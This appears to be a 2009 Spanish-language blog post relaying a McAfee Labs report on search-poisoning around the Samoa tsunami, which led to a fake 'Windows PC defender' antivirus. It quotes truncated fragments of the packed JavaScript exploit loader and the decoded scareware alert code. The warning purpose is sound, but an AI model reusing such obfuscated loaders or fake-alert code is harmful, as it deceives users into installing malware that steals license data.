McAfee Labs ha descubierto otro intento despiadado de los creadores de malwares de beneficiarse de desastres y tragedias.

A traves de la búsqueda de información  sobre los terremotos y el tsunami que sacudió las Islas de Samoa Americana el 29 de septiembre, aparecen los siguientes resultados desde el motor de búsqueda de Google:

Al hacer clic en uno de los vínculos, que a primera vista parecen ser legítimas, el ordenador visualiza una alerta de una posible infección:

Lo que sucede realmente detrás de la pantalla del navegador (en este caso Internet Explorer versión 8, en un sistema de Windows XP con parches) el link del enlace  conecta sigilosamente con un servidor alojado en Polonia, que se carga una vulnerabilidad de seguridad del conocido compresor de Dean Edwards, documentada el año pasado.

Este es un fragmento de la vulnerabilidad de carga de seguridad:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!”.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’28 61={“174″:35,”295″:35,”297″:35,”614″:35,”298″:35,”233″:-1,”272″:”\\36\\21\\19\\36\\21\\19\\36\\36<!—->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

Y esto es un fragmento de una parte más interesante en versión descifrada de la vulnerabilidad de seguridad:
{kPromo.alerts.minimizeWindow();alert(“Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.”);kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?”alert_window_”+
kPromo.alerts.windows.length:”alert_window_0″;
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].
El ataque a su vez se conecta a un servidor alojado en China que descarga (con la intervención del usuario) un archivo ejecutable que resulta ser  otra variante de fake alert “Windows PC defender”.

Después de pocos minutos del malware ejecutando, información del ID de producto de Windows y la clave de licencia de Windows del sistema, se envían a un servidor alojado en Rusia.

Es sorprendente la forma rápida y bien preparada con que actuan los autores de los  malware hoy en día. Aprovechan las oportunidades que surgen para explotar  nuestras máquinas, abusando de nuestra confianza en las noticias. Hacen uso de técnicas conocidas (como la optimización de motores de búsqueda) reforzada por la sensibilidad de la gente hacia los trágicos acontecimientos de todo el mundo que siguen millones de personas 
Fuente

Pues mucho cuidado que siempre hay tragedias y eventos que consultar …

saludos

ms, 2-10-2009